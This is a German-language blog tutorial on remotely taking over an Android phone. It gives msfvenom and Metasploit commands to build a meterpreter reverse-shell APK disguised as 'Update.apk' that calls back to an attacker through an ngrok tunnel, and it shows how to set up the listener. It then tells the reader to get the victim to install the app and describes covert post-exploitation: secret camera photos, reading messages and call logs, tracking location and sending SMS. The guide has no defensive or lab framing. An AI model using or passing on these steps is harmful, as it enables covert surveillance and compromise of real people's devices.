Hacking Android Device [Remotely]

Hacking over WAN

Sie können sich mein Video-Tutorial auf youtube hier ansehen:
https://youtu.be/Bbp-AcejtHI

Normalerweise braucht man im WAN erstens eine statische IP/Hostname und zweitens muss man Port Forwarding machen, um die Übertragung des Datenverkehrs zu ermöglichen, und wir alle wissen, dass beides in Echtzeit so schwierig ist, da wir nur begrenzten Zugang zu den Ports in einem Netzwerk haben.

Wir werden also in diesem Szenario einen sicheren Tunnel mit Ngrok einrichten.

Ngrok ist ein Tunneling-Reverse-Proxy-System, das Tunnel von einem öffentlichen Endpunkt, z.B. dem Internet, zu einem lokal laufenden Netzwerkdienst einrichtet. Dies kann uns helfen, eine öffentliche HTTP/HTTPS-URL für eine lokal auf unserem Rechner laufende Website zu erstellen. Wir müssen keine Portweiterleitung vornehmen, wenn wir Ngrok verwenden, und unser Netzwerkdienst wird schließlich mit Hilfe von TCP-Tunneling dem Internet ausgesetzt.

Befolgen Sie diese Schritte, um fortzufahren:

Schritt 1: Melden Sie sich für das Ngrok-Konto an, um es herunterzuladen.

Zuerst müssen Sie sich für das Ngrok-Konto anmelden, danach werden Sie zum Download-Fenster aufgefordert.

Signup-Fenster von Ngrok

Nach der Anmeldung können Sie das Ngrok für Ihr Linux-System herunterladen.

Entpacken Sie einfach die heruntergeladene Datei.

Schritt 2: Verbinden Sie Ihr Konto

Durch das Ausführen dieses Befehls wird Ihr Auth-Token zur Standard-ngrok.yml Konfigurationsdatei hinzugefügt. Dadurch erhalten Sie Zugang zu mehr Funktionen und längeren Sitzungszeiten. (Sie müssen Ihr eigenes Token hierher kopieren und einfügen, das auf dem Startbildschirm von ngrok nach dem Einloggen angezeigt wird)

./ngrok authtoken <Ihr Token>

Jetzt sind Sie bereit, dieses Tool zu benutzen. Öffnen Sie Ihr Terminal, wechseln Sie in das Verzeichnis, in das Sie das Ngrock-Tool extrahiert haben, und geben Sie ein:

./ngrok tcp

Wählen Sie eine Portnummer, an die Sie eine Verbindung binden möchten (hier habe ich 5555 als Portnummer gewählt). Nach dem Drücken der Eingabetaste wird ein Bildschirm wie dieser angezeigt.

Die Weiterleitung gibt den TCP-Tunnel an, den ngrok erstellt hat. Die Verbindung wurde an den localhost auf Port 5555 gebunden. Nun müssen wir einen bösartigen Payload mit msfvenom generieren.

Schritt3: Generieren des Payloads

Sie können dies tun, indem Sie ein neues Terminal in Ihrer Kali Linux Maschine öffnen und dann den folgenden Code eingeben.

msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=15787 R> .apk

Aber denken Sie daran, dass es dieses Mal ein bisschen anders ist als der Angriff, den wir im LAN durchgeführt haben. Hier müssen wir anstelle der IP-Adresse den in ngrok bereitgestellten Weiterleitungslink eingeben (2.tcp.ngrok.io). Und die Portnummer wird 15787 sein. Denken Sie daran, dass es wichtig ist, die gleiche Portnummer einzugeben, die von Ngrok in der Portweiterleitung bereitgestellt wird.

Hinweis: Wenn die Eingabe der IP-Adresse als 2.tcp.ngrok.io nicht funktioniert, können Sie sie durch eine IP-Adresse ersetzen, die Sie mit dem Befehl „ping“ erhalten können.
Öffnen Sie ein Terminal und geben Sie ping 2.tcp.ngrok.io ein und drücken Sie die Eingabetaste. Sie erhalten eine IP-Adresse, die Sie anstelle von LHOST eingeben müssen.

Hier habe ich „Update.apk“ als Dateinamen für unsere Nutzlast verwendet. Diese Datei soll auf dem Android-Gerät unseres Ziels installiert werden. Bevor wir diese Datei installieren, müssen wir jedoch unseren Listener einstellen. Führen Sie dazu Schritt 4 aus.

Schritt 4: Einrichten eines Listeners

Öffnen Sie Ihr Terminal und laden Sie die Metasploit-Konsole, indem Sie Folgendes eingeben: msfconsole
Nach dem Laden (nach ein paar Sekunden) laden Sie den Multi-Handler-Exploit, indem Sie Folgendes eingeben:

Exploit/multi/handler

Nun richten Sie einen Reverse-Payload ein, indem Sie eingeben:

set payload android/meterpreter/reverse_tcp

Setzen Sie Ihren LHOST auf 0.0.0.0 und LPORT als 5555
(Die Portnummer sollte mit der Portnummer übereinstimmen, die zum Binden der Verbindung in ngrok verwendet wurde)

set LHOST 0.0.0.0
set LPORT 5555

Schließlich geben Sie exploit ein, um den Listener zu starten.

Der Abhörmodus ist eingeschaltet

Schritt 5: Installieren Sie die Datei Malicious Update.apk auf dem Gerät des Ziels

Lassen Sie das Opfer die App installieren und führen Sie sie aus, sobald sie installiert ist. Wenn das Opfer die Option „App öffnen“ berührt, erhalten Sie Zugriff auf alle Funktionen des Android-Geräts. Auf dem Bildschirm des Geräts wird jedoch nichts angezeigt, nachdem die App geöffnet wurde.

Post-Exploitation

Tippen Sie Hilfe, um die verschiedenen Optionen zu sehen, die Sie verwenden können, um die verschiedenen Aufgaben auf dem Gerät des Opfers auszuführen.
Sie können auf die Kamera des Opfers zugreifen und ein Foto machen, ohne es zu benachrichtigen. Sie können ihre Nachrichten und Anrufprotokolle überprüfen und sie auch in Ihrem System speichern.
Außerdem können Sie jede auf dem Gerät installierte Anwendung anzeigen und öffnen. Sie können sogar die aktuellen Standortkoordinaten des Benutzers abrufen.
Sie können auch Nachrichten an jede beliebige Kontaktnummer über das Gerät senden.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht.